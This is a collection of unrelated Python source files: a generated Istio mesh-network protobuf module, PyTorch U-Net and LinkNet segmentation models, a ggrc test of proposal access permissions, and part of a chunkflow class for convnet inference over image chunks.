filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='networks', full_name='istio.mesh.v1alpha1.MeshNetworks.networks', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_MESHNETWORKS_NETWORKSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=432,
serialized_end=597,
)
_NETWORK_NETWORKENDPOINTS.containing_type = _NETWORK
_NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne'].fields.append(
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_cidr'])
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_cidr'].containing_oneof = _NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne']
_NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne'].fields.append(
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_registry'])
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_registry'].containing_oneof = _NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne']
_NETWORK_ISTIONETWORKGATEWAY.containing_type = _NETWORK
_NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw'].fields.append(
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['registry_service_name'])
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['registry_service_name'].containing_oneof = _NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw']
_NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw'].fields.append(
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['address'])
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['address'].containing_oneof = _NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw']
_NETWORK.fields_by_name['endpoints'].message_type = _NETWORK_NETWORKENDPOINTS
_NETWORK.fields_by_name['gateways'].message_type = _NETWORK_ISTIONETWORKGATEWAY
_MESHNETWORKS_NETWORKSENTRY.fields_by_name['value'].message_type = _NETWORK
_MESHNETWORKS_NETWORKSENTRY.containing_type = _MESHNETWORKS
_MESHNETWORKS.fields_by_name['networks'].message_type = _MESHNETWORKS_NETWORKSENTRY
DESCRIPTOR.message_types_by_name['Network'] = _NETWORK
DESCRIPTOR.message_types_by_name['MeshNetworks'] = _MESHNETWORKS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Network = _reflection.GeneratedProtocolMessageType('Network', (_message.Message,), {
'NetworkEndpoints' : _reflection.GeneratedProtocolMessageType('NetworkEndpoints', (_message.Message,), {
'DESCRIPTOR' : _NETWORK_NETWORKENDPOINTS,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.Network.NetworkEndpoints)
})
,
'IstioNetworkGateway' : _reflection.GeneratedProtocolMessageType('IstioNetworkGateway', (_message.Message,), {
'DESCRIPTOR' : _NETWORK_ISTIONETWORKGATEWAY,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.Network.IstioNetworkGateway)
})
,
'DESCRIPTOR' : _NETWORK,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.Network)
})
_sym_db.RegisterMessage(Network)
_sym_db.RegisterMessage(Network.NetworkEndpoints)
_sym_db.RegisterMessage(Network.IstioNetworkGateway)
MeshNetworks = _reflection.GeneratedProtocolMessageType('MeshNetworks', (_message.Message,), {
'NetworksEntry' : _reflection.GeneratedProtocolMessageType('NetworksEntry', (_message.Message,), {
'DESCRIPTOR' : _MESHNETWORKS_NETWORKSENTRY,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.MeshNetworks.NetworksEntry)
})
,
'DESCRIPTOR' : _MESHNETWORKS,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.MeshNetworks)
})
_sym_db.RegisterMessage(MeshNetworks)
_sym_db.RegisterMessage(MeshNetworks.NetworksEntry)
DESCRIPTOR._options = None
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['port']._options = None
_NETWORK.fields_by_name['endpoints']._options = None
_NETWORK.fields_by_name['gateways']._options = None
_MESHNETWORKS_NETWORKSENTRY._options = None
_MESHNETWORKS.fields_by_name['networks']._options = None
# @@protoc_insertion_point(module_scope)
|
py | 7dfaf3bbf931a329199701691a0f6f1c8dfa5810 | from torch import nn
import torch
from torchvision import models
import torchvision
from torch.nn import functional as F
def conv3x3(in_, out):
return nn.Conv2d(in_, out, 3, padding=1)
class ConvRelu(nn.Module):
def __init__(self, in_: int, out: int):
super().__init__()
self.conv = conv3x3(in_, out)
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.activation(x)
return x
class DecoderBlock(nn.Module):
"""
Paramaters for Deconvolution were chosen to avoid artifacts, following
link https://distill.pub/2016/deconv-checkerboard/
"""
def __init__(self, in_channels, middle_channels, out_channels, is_deconv=True):
super(DecoderBlock, self).__init__()
self.in_channels = in_channels
if is_deconv:
self.block = nn.Sequential(
ConvRelu(in_channels, middle_channels),
nn.ConvTranspose2d(middle_channels, out_channels, kernel_size=4, stride=2,
padding=1),
nn.ReLU(inplace=True)
)
else:
self.block = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False),
ConvRelu(in_channels, middle_channels),
ConvRelu(middle_channels, out_channels),
)
def forward(self, x):
return self.block(x)
class UNet11(nn.Module):
def __init__(self, num_classes=1, num_filters=32, pretrained=True):
"""
:param num_classes:
:param num_filters:
:param pretrained:
False - no pre-trained network used
True - encoder pre-trained with VGG11
"""
super().__init__()
self.pool = nn.MaxPool2d(2, 2)
self.num_classes = num_classes
self.encoder = models.vgg11(pretrained=pretrained).features
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Sequential(self.encoder[0],
self.relu)
self.conv2 = nn.Sequential(self.encoder[3],
self.relu)
self.conv3 = nn.Sequential(
self.encoder[6],
self.relu,
self.encoder[8],
self.relu,
)
self.conv4 = nn.Sequential(
self.encoder[11],
self.relu,
self.encoder[13],
self.relu,
)
self.conv5 = nn.Sequential(
self.encoder[16],
self.relu,
self.encoder[18],
self.relu,
)
self.center = DecoderBlock(256 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv=True)
self.dec5 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv=True)
self.dec4 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 4, is_deconv=True)
self.dec3 = DecoderBlock(256 + num_filters * 4, num_filters * 4 * 2, num_filters * 2, is_deconv=True)
self.dec2 = DecoderBlock(128 + num_filters * 2, num_filters * 2 * 2, num_filters, is_deconv=True)
self.dec1 = ConvRelu(64 + num_filters, num_filters)
self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(self.pool(conv1))
conv3 = self.conv3(self.pool(conv2))
conv4 = self.conv4(self.pool(conv3))
conv5 = self.conv5(self.pool(conv4))
center = self.center(self.pool(conv5))
dec5 = self.dec5(torch.cat([center, conv5], 1))
dec4 = self.dec4(torch.cat([dec5, conv4], 1))
dec3 = self.dec3(torch.cat([dec4, conv3], 1))
dec2 = self.dec2(torch.cat([dec3, conv2], 1))
dec1 = self.dec1(torch.cat([dec2, conv1], 1))
if self.num_classes > 1:
x_out = F.log_softmax(self.final(dec1), dim=1)
else:
x_out = self.final(dec1)
return x_out
class UNet16(nn.Module):
def __init__(self, num_classes=1, num_filters=32, pretrained=True):
"""
:param num_classes:
:param num_filters:
:param pretrained:
False - no pre-trained network used
True - encoder pre-trained with VGG11
"""
super().__init__()
self.num_classes = num_classes
self.pool = nn.MaxPool2d(2, 2)
self.encoder = torchvision.models.vgg16(pretrained=pretrained).features
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Sequential(self.encoder[0],
self.relu,
self.encoder[2],
self.relu)
self.conv2 = nn.Sequential(self.encoder[5],
self.relu,
self.encoder[7],
self.relu)
self.conv3 = nn.Sequential(self.encoder[10],
self.relu,
self.encoder[12],
self.relu,
self.encoder[14],
self.relu)
self.conv4 = nn.Sequential(self.encoder[17],
self.relu,
self.encoder[19],
self.relu,
self.encoder[21],
self.relu)
self.conv5 = nn.Sequential(self.encoder[24],
self.relu,
self.encoder[26],
self.relu,
self.encoder[28],
self.relu)
self.center = DecoderBlock(512, num_filters * 8 * 2, num_filters * 8)
self.dec5 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8)
self.dec4 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8)
self.dec3 = DecoderBlock(256 + num_filters * 8, num_filters * 4 * 2, num_filters * 2)
self.dec2 = DecoderBlock(128 + num_filters * 2, num_filters * 2 * 2, num_filters)
self.dec1 = ConvRelu(64 + num_filters, num_filters)
self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(self.pool(conv1))
conv3 = self.conv3(self.pool(conv2))
conv4 = self.conv4(self.pool(conv3))
conv5 = self.conv5(self.pool(conv4))
center = self.center(self.pool(conv5))
dec5 = self.dec5(torch.cat([center, conv5], 1))
dec4 = self.dec4(torch.cat([dec5, conv4], 1))
dec3 = self.dec3(torch.cat([dec4, conv3], 1))
dec2 = self.dec2(torch.cat([dec3, conv2], 1))
dec1 = self.dec1(torch.cat([dec2, conv1], 1))
if self.num_classes > 1:
x_out = F.log_softmax(self.final(dec1), dim=1)
else:
x_out = self.final(dec1)
return x_out
class DecoderBlockLinkNet(nn.Module):
def __init__(self, in_channels, n_filters):
super().__init__()
self.relu = nn.ReLU(inplace=True)
# B, C, H, W -> B, C/4, H, W
self.conv1 = nn.Conv2d(in_channels, in_channels // 4, 1)
self.norm1 = nn.BatchNorm2d(in_channels // 4)
# B, C/4, H, W -> B, C/4, 2 * H, 2 * W
self.deconv2 = nn.ConvTranspose2d(in_channels // 4, in_channels // 4, kernel_size=4,
stride=2, padding=1, output_padding=0)
self.norm2 = nn.BatchNorm2d(in_channels // 4)
# B, C/4, H, W -> B, C, H, W
self.conv3 = nn.Conv2d(in_channels // 4, n_filters, 1)
self.norm3 = nn.BatchNorm2d(n_filters)
def forward(self, x):
x = self.conv1(x)
x = self.norm1(x)
x = self.relu(x)
x = self.deconv2(x)
x = self.norm2(x)
x = self.relu(x)
x = self.conv3(x)
x = self.norm3(x)
x = self.relu(x)
return x
class LinkNet34(nn.Module):
def __init__(self, num_classes=1, num_channels=1, pretrained=True):
super().__init__()
# assert num_channels == 3 # why?
self.num_classes = num_classes
filters = [64, 128, 256, 512]
resnet = models.resnet34(pretrained=pretrained)
self.firstconv = resnet.conv1
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlockLinkNet(filters[3], filters[2])
self.decoder3 = DecoderBlockLinkNet(filters[2], filters[1])
self.decoder2 = DecoderBlockLinkNet(filters[1], filters[0])
self.decoder1 = DecoderBlockLinkNet(filters[0], filters[0])
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nn.ReLU(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nn.ReLU(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
if self.num_classes > 1:
x_out = F.log_softmax(f5, dim=1)
else:
x_out = f5
return x_out
class Conv3BN(nn.Module):
def __init__(self, in_: int, out: int, bn=False):
super().__init__()
self.conv = conv3x3(in_, out)
self.bn = nn.BatchNorm2d(out) if bn else None
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
x = self.activation(x)
return x
class UNetModule(nn.Module):
def __init__(self, in_: int, out: int):
super().__init__()
self.l1 = Conv3BN(in_, out)
self.l2 = Conv3BN(out, out)
def forward(self, x):
x = self.l1(x)
x = self.l2(x)
return x
class UNet(nn.Module):
"""
Vanilla UNet.
Implementation from https://github.com/lopuhin/mapillary-vistas-2017/blob/master/unet_models.py
"""
output_downscaled = 1
module = UNetModule
def __init__(self,
input_channels: int = 3,
filters_base: int = 32,
down_filter_factors=(1, 2, 4, 8, 16),
up_filter_factors=(1, 2, 4, 8, 16),
bottom_s=4,
num_classes=1,
add_output=True):
super().__init__()
self.num_classes = num_classes
assert len(down_filter_factors) == len(up_filter_factors)
assert down_filter_factors[-1] == up_filter_factors[-1]
down_filter_sizes = [filters_base * s for s in down_filter_factors]
up_filter_sizes = [filters_base * s for s in up_filter_factors]
self.down, self.up = nn.ModuleList(), nn.ModuleList()
self.down.append(self.module(input_channels, down_filter_sizes[0]))
for prev_i, nf in enumerate(down_filter_sizes[1:]):
self.down.append(self.module(down_filter_sizes[prev_i], nf))
for prev_i, nf in enumerate(up_filter_sizes[1:]):
self.up.append(self.module(
down_filter_sizes[prev_i] + nf, up_filter_sizes[prev_i]))
pool = nn.MaxPool2d(2, 2)
pool_bottom = nn.MaxPool2d(bottom_s, bottom_s)
upsample = nn.Upsample(scale_factor=2)
upsample_bottom = nn.Upsample(scale_factor=bottom_s)
self.downsamplers = [None] + [pool] * (len(self.down) - 1)
self.downsamplers[-1] = pool_bottom
self.upsamplers = [upsample] * len(self.up)
self.upsamplers[-1] = upsample_bottom
self.add_output = add_output
if add_output:
self.conv_final = nn.Conv2d(up_filter_sizes[0], num_classes, 1)
def forward(self, x):
xs = []
for downsample, down in zip(self.downsamplers, self.down):
x_in = x if downsample is None else downsample(xs[-1])
x_out = down(x_in)
xs.append(x_out)
x_out = xs[-1]
for x_skip, upsample, up in reversed(
list(zip(xs[:-1], self.upsamplers, self.up))):
x_out = upsample(x_out)
x_out = up(torch.cat([x_out, x_skip], 1))
if self.add_output:
x_out = self.conv_final(x_out)
if self.num_classes > 1:
x_out = F.log_softmax(x_out, dim=1)
return x_out
class AlbuNet(nn.Module):
"""
UNet (https://arxiv.org/abs/1505.04597) with Resnet34(https://arxiv.org/abs/1512.03385) encoder
Proposed by Alexander Buslaev: https://www.linkedin.com/in/al-buslaev/
"""
def __init__(self, num_classes=1, num_filters=32, pretrained=True, is_deconv=False):
"""
:param num_classes:
:param num_filters:
:param pretrained:
False - no pre-trained network is used
True - encoder is pre-trained with resnet34
:is_deconv:
False: bilinear interpolation is used in decoder
True: deconvolution is used in decoder
"""
super().__init__()
self.num_classes = num_classes
self.pool = nn.MaxPool2d(2, 2)
self.encoder = torchvision.models.resnet34(pretrained=pretrained)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Sequential(self.encoder.conv1,
self.encoder.bn1,
self.encoder.relu,
self.pool)
self.conv2 = self.encoder.layer1
self.conv3 = self.encoder.layer2
self.conv4 = self.encoder.layer3
self.conv5 = self.encoder.layer4
self.center = DecoderBlock(512, num_filters * 8 * 2, num_filters * 8, is_deconv)
self.dec5 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)
self.dec4 = DecoderBlock(256 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)
self.dec3 = DecoderBlock(128 + num_filters * 8, num_filters * 4 * 2, num_filters * 2, is_deconv)
self.dec2 = DecoderBlock(64 + num_filters * 2, num_filters * 2 * 2, num_filters * 2 * 2, is_deconv)
self.dec1 = DecoderBlock(num_filters * 2 * 2, num_filters * 2 * 2, num_filters, is_deconv)
self.dec0 = ConvRelu(num_filters, num_filters)
self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
conv4 = self.conv4(conv3)
conv5 = self.conv5(conv4)
center = self.center(self.pool(conv5))
dec5 = self.dec5(torch.cat([center, conv5], 1))
dec4 = self.dec4(torch.cat([dec5, conv4], 1))
dec3 = self.dec3(torch.cat([dec4, conv3], 1))
dec2 = self.dec2(torch.cat([dec3, conv2], 1))
dec1 = self.dec1(dec2)
dec0 = self.dec0(dec1)
if self.num_classes > 1:
x_out = F.log_softmax(self.final(dec0), dim=1)
else:
x_out = self.final(dec0)
return x_out
|
py | 7dfaf4a1c5290ee4db43a22bb83dc493feb31232 | # Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test for proposal in case of usage of custom creator role"""
import json
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.access_control import acl_helper
from integration.ggrc.api_helper import Api
from integration.ggrc.models import factories
from integration.ggrc.proposal import _get_query_proposal_request
from integration.ggrc_basic_permissions.models \
import factories as rbac_factories
from integration.ggrc.query_helper import WithQueryApi
class TestOwnerAccess(TestCase, WithQueryApi):
"""Ensure that global creator has access to created proposal by him"""
def setUp(self):
super(TestOwnerAccess, self).setUp()
self.client.get("/login")
self.api = Api()
@staticmethod
def _get_create_proposal_request(program_id, acr_id, person_id):
"""Prepare dict with proposal creation request"""
return {
"proposal": {
"instance": {
"id": program_id,
"type": all_models.Program.__name__,
},
"full_instance_content": {"title": "new_title"},
"agenda": "update cav",
"context": None,
"access_control_list": [acl_helper.get_acl_json(acr_id, person_id)]
}
}
def test_admin_has_access(self):
"""Ensure that global creator has access to created proposal by him"""
role_creator = all_models.Role.query.filter(
all_models.Role.name == "Creator").one()
# prepare - create program, assign roles
factories.AccessControlRoleFactory(name="ACL_Reader", update=0,
object_type="Program")
with factories.single_commit():
program = factories.ProgramFactory()
person = factories.PersonFactory()
rbac_factories.UserRoleFactory(role=role_creator, person=person)
factories.AccessControlPersonFactory(
ac_list=program.acr_name_acl_map["ACL_Reader"],
person=person,
)
program_id = program.id
# make query to create proposal
self.api.set_user(person)
self.client.get("/login")
acr_class = all_models.AccessControlRole
acr = acr_class.query.filter(acr_class.name == 'ProposalEditor',
acr_class.object_type == 'Proposal').one()
create_data = self._get_create_proposal_request(
program_id, acr.id, person.id)
self.api.post(all_models.Proposal, create_data)
query_data = _get_query_proposal_request(program_id)
headers = {"Content-Type": "application/json", }
resp = self.api.client.post("/query",
data=json.dumps(query_data),
headers=headers).json
self.assertEqual(1, len(resp))
self.assertEqual(resp[0]["Proposal"]["count"], 1)
def test_nonadmin_has_no_access(self):
"""Test access to proposal for non creator of proposal"""
role_creator = all_models.Role.query.filter(
all_models.Role.name == "Creator").one()
# prepare - create program, assign roles
factories.AccessControlRoleFactory(name="ACL_Reader", update=0,
object_type="Program")
with factories.single_commit():
program = factories.ProgramFactory()
person1 = factories.PersonFactory()
person2 = factories.PersonFactory()
for person in (person1, person2):
rbac_factories.UserRoleFactory(role=role_creator, person=person)
factories.AccessControlPersonFactory(
ac_list=program.acr_name_acl_map["ACL_Reader"],
person=person,
)
program_id = program.id
person2_id = person2.id
# make query to create proposal by person1
self.api.set_user(person1)
self.client.get("/login")
acr_class = all_models.AccessControlRole
acr = acr_class.query.filter(acr_class.name == 'ProposalEditor',
acr_class.object_type == 'Proposal').one()
create_data = self._get_create_proposal_request(
program_id, acr.id, person1.id)
self.api.post(all_models.Proposal, create_data)
# login as person2 and make request
self.api.set_user(all_models.Person.query.get(person2_id))
self.client.get("/login")
query_data = _get_query_proposal_request(program_id)
headers = {"Content-Type": "application/json", }
resp = self.api.client.post("/query",
data=json.dumps(query_data),
headers=headers).json
self.assertEqual(1, len(resp))
self.assertEqual(resp[0]["Proposal"]["count"], 0)
|
py | 7dfaf7e1979e72e2cb64ec98e854470dd8721365 | #!/usr/bin/env python
__doc__ = """
ConvNet Inference of an image chunk
"""
import os
import logging
import time
import numpy as np
from tqdm import tqdm
from warnings import warn
from typing import Union
from .patch.base import PatchInferencerBase
from tempfile import mktemp
from chunkflow.chunk import Chunk
# from chunkflow.chunk.affinity_map import AffinityMap
class Inferencer(object):
"""
Inferencer
convnet inference for a whole chunk.
if the patches align with the input chunk size, we do not need chunk mask.
if the patches do not align, we'll create a chunk mask to make sure that
the output have the same size with input.
The output buffer is smaller than the input chunk size, and the cropped
margin area is not allocated. This will save about 20% of memory usage.
what's more, the output buffer is formated as memory map and was mapped
to disk. This is particularly useful for multiple channel output with
large chunk size.
"""
def __init__(self,
convnet_model: Union[str, PatchInferencerBase],
convnet_weight_path: str,
input_patch_size: Union[tuple, list],
output_patch_size: Union[tuple, list] = None,
patch_num: Union[tuple, list] = None,
num_output_channels: int = 3,
output_patch_overlap: Union[tuple, list] = (4, 64, 64),
output_crop_margin: Union[tuple, list] = None,
dtype = 'float32',
framework: str = 'identity',
batch_size: int = 1,
bump: str = 'wu',
input_size: tuple = None,
mask_output_chunk: bool = False,
mask_myelin_threshold = None,
dry_run: bool = False):
assert input_size is None or patch_num is None
if output_patch_size is None:
output_patch_size = input_patch_size
if logging.getLogger().getEffectiveLevel() <= 30:
self.verbose = True
else:
self.verbose = False
self.input_patch_size = input_patch_size
self.output_patch_size = output_patch_size
self.output_patch_overlap = output_patch_overlap
self.patch_num = patch_num
self.batch_size = batch_size
self.input_size = input_size
if output_crop_margin is None:
if mask_output_chunk:
self.output_crop_margin = (0,0,0)
else:
self.output_crop_margin = self.output_patch_overlap
else:
self.output_crop_margin = output_crop_margin
# we should always crop more than the patch overlap
# since the overlap region is reweighted by patch mask
# To-Do: equal should also be OK
assert np.alltrue([v<=m for v, m in zip(
self.output_patch_overlap,
self.output_crop_margin)])
self.output_patch_crop_margin = tuple((ips-ops)//2 for ips, ops in zip(
input_patch_size, output_patch_size))
self.output_offset = tuple(opcm+ocm for opcm, ocm in zip(
self.output_patch_crop_margin, self.output_crop_margin))
self.output_patch_stride = tuple(s - o for s, o in zip(
output_patch_size, output_patch_overlap))
self.input_patch_overlap = tuple(opcm*2+oo for opcm, oo in zip(
self.output_patch_crop_margin, self.output_patch_overlap))
self.input_patch_stride = tuple(ps - po for ps, po in zip(
input_patch_size, self.input_patch_overlap))
# no chunk wise mask, the patches should be aligned inside chunk
if not mask_output_chunk:
assert (self.input_size is not None) or (self.patch_num is not None)
if patch_num is None:
assert input_size is not None
self.patch_num = tuple((isz - o)//s for isz, o, s in zip(
self.input_size, self.input_patch_overlap, self.input_patch_stride))
if self.input_size is None:
assert self.patch_num is not None
self.input_size = tuple(pst*pn + po for pst, pn, po in zip(
self.input_patch_stride, self.patch_num, self.input_patch_overlap))
self.output_size = tuple(pst*pn + po - 2*ocm for pst, pn, po, ocm in zip(
self.output_patch_stride, self.patch_num,
self.output_patch_overlap, self.output_crop_margin))
else:
# we can handle arbitrary input and output size
self.input_size = None
self.output_size = None
self.num_output_channels = num_output_channels
self.mask_output_chunk = mask_output_chunk
self.output_chunk_mask = None
self.dtype = dtype
self.mask_myelin_threshold = mask_myelin_threshold
self.dry_run = dry_run
# allocate a buffer to avoid redundant memory allocation
self.input_patch_buffer = np.zeros((batch_size, 1, *input_patch_size),
dtype=dtype)
self.patch_slices_list = []
if isinstance(convnet_model, str):
convnet_model = os.path.expanduser(convnet_model)
if isinstance(convnet_weight_path, str):
convnet_weight_path = os.path.expanduser(convnet_weight_path)
self._prepare_patch_inferencer(framework, convnet_model, convnet_weight_path, bump)
@property
def compute_device(self):
return self.patch_inferencer.compute_device
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
pass
def _update_parameters_for_input_chunk(self, input_chunk):
"""
if the input size is consistent with old one, reuse the
patch offset list and output chunk mask. Otherwise, recompute them.
"""
if np.array_equal(self.input_size, input_chunk.shape):
print('reusing output chunk mask.')
assert self.patch_slices_list is not None
else:
if self.input_size is not None:
warn('the input size has changed, using new intput size.')
self.input_size = input_chunk.shape
if not self.mask_output_chunk:
self._check_alignment()
self.output_size = tuple(
isz-2*ocso for isz, ocso in
zip(self.input_size, self.output_offset))
self.output_patch_stride = tuple(s-o for s, o in zip(
self.output_patch_size, self.output_patch_overlap))
self._construct_patch_slices_list(input_chunk.voxel_offset)
self._construct_output_chunk_mask(input_chunk)
def _prepare_patch_inferencer(self, framework, convnet_model, convnet_weight_path, bump):
# allow to pass patch_inferencer directly, if so assign and return
if framework == 'prebuilt':
self.patch_inferencer = convnet_model
return
# prepare for inference
if framework == 'pznet':
from .patch.pznet import PZNet as PatchInferencer
elif framework == 'pytorch':
# pytorch will not output consistent result if we use batch size > 1
# https://discuss.pytorch.org/t/solved-inconsistent-results-during-test-using-different-batch-size/2265
assert self.batch_size == 1
from .patch.pytorch import PyTorch as PatchInferencer
# currently, we do not support pytorch backend with different
# input and output patch size and overlap.
elif framework == 'pytorch-multitask':
# currently only this type of task support mask in device
from .patch.pytorch_multitask import PyTorchMultitask as PatchInferencer
elif framework == 'identity':
from .patch.identity import Identity as PatchInferencer
elif framework == 'universal':
from .patch.universal import Universal as PatchInferencer
else:
raise Exception(f'invalid inference backend: {self.framework}')
self.patch_inferencer = PatchInferencer(
convnet_model,
convnet_weight_path,
input_patch_size=self.input_patch_size,
output_patch_size=self.output_patch_size,
output_patch_overlap=self.output_patch_overlap,
num_output_channels=self.num_output_channels,
dtype=self.dtype,
bump=bump)
def _check_alignment(self):
is_align = tuple((i - o) % s == 0 for i, s, o in zip(
self.input_size,
self.patch_inferencer.input_patch_stride,
self.patch_inferencer.input_patch_overlap))
# all axis should be aligned
# the patches should aligned with input size in case
# we will not mask the output chunk
assert np.all(is_align)
logging.info('great! patches aligns in chunk.')
def _construct_patch_slices_list(self, input_chunk_offset):
"""
create the normalization mask and patch bounding box list
"""
self.patch_slices_list = []
# the step is the stride, so the end of aligned patch is
# input_size - patch_overlap
input_patch_size = self.input_patch_size
output_patch_size = self.output_patch_size
input_patch_overlap = self.input_patch_overlap
input_patch_stride = self.input_patch_stride
print('Construct patch slices list...')
for iz in range(0, self.input_size[0] - input_patch_overlap[0], input_patch_stride[0]):
if iz + input_patch_size[0] > self.input_size[0]:
iz = self.input_size[0] - input_patch_size[0]
assert iz >= 0
iz += input_chunk_offset[-3]
oz = iz + self.output_patch_crop_margin[0]
for iy in range(0, self.input_size[1] - input_patch_overlap[1], input_patch_stride[1]):
if iy + input_patch_size[1] > self.input_size[1]:
iy = self.input_size[1] - input_patch_size[1]
assert iy >= 0
iy += input_chunk_offset[-2]
oy = iy + self.output_patch_crop_margin[1]
for ix in range(0, self.input_size[2] - input_patch_overlap[2], input_patch_stride[2]):
if ix + input_patch_size[2] > self.input_size[2]:
ix = self.input_size[2] - input_patch_size[2]
assert ix >= 0
ix += input_chunk_offset[-1]
ox = ix + self.output_patch_crop_margin[2]
input_patch_slice = (slice(iz, iz + input_patch_size[0]),
slice(iy, iy + input_patch_size[1]),
slice(ix, ix + input_patch_size[2]))
output_patch_slice = (slice(oz, oz + output_patch_size[0]),
slice(oy, oy + output_patch_size[1]),
slice(ox, ox + output_patch_size[2]))
self.patch_slices_list.append((input_patch_slice, output_patch_slice))
def _construct_output_chunk_mask(self, input_chunk):
if not self.mask_output_chunk:
return
logging.info('creating output chunk mask...')
if self.output_chunk_mask is None or not np.array_equal(
input_chunk.shape, self.output_chunk_mask.shape):
# To-Do: clean up extra temporal files if we created
# multiple mmap files
#output_mask_mmap_file = mktemp(suffix='.dat')
## the memory map is initialized with 0 in default
#output_mask_array = np.memmap(output_mask_mmap_file,
# dtype=self.dtype, mode='w+',
# shape=self.output_size)
output_mask_array = np.zeros(self.output_size, self.dtype)
else:
output_mask_array = self.output_chunk_mask.array
output_mask_array.fill(0)
output_voxel_offset = tuple(io + ocso for io, ocso in zip(
input_chunk.voxel_offset, self.output_offset))
self.output_chunk_mask = Chunk(
output_mask_array,
voxel_offset=output_voxel_offset,
voxel_size=input_chunk.voxel_size
)
assert len(self.patch_slices_list) > 0
for _, output_patch_slice in self.patch_slices_list:
# accumulate weights using the patch mask in RAM
patch_voxel_offset = tuple(s.start for s in output_patch_slice)
patch_mask = Chunk(self.patch_inferencer.output_patch_mask_numpy,
voxel_offset=patch_voxel_offset)
self.output_chunk_mask.blend(patch_mask)
# normalize weight, so accumulated inference result multiplies
# this mask will result in 1
self.output_chunk_mask.array = 1.0 / self.output_chunk_mask.array
def _get_output_buffer(self, input_chunk):
output_buffer_size = (self.patch_inferencer.num_output_channels, ) + self.output_size
#if self.mask_myelin_threshold is None:
# a random temporal file. will be removed later.
#output_buffer_mmap_file = mktemp(suffix='.dat')
## the memory map is initialized with 0 in default
#output_buffer_array = np.memmap(output_buffer_mmap_file,
# dtype=self.dtype, mode='w+',
# shape=output_buffer_size)
##else:
# # when we use myelin mask, the masking computation will create a full array in RAM!
# # and it will duplicate the array! thus, we should use normal array in this case.
output_buffer_array = np.zeros(output_buffer_size, dtype=self.dtype)
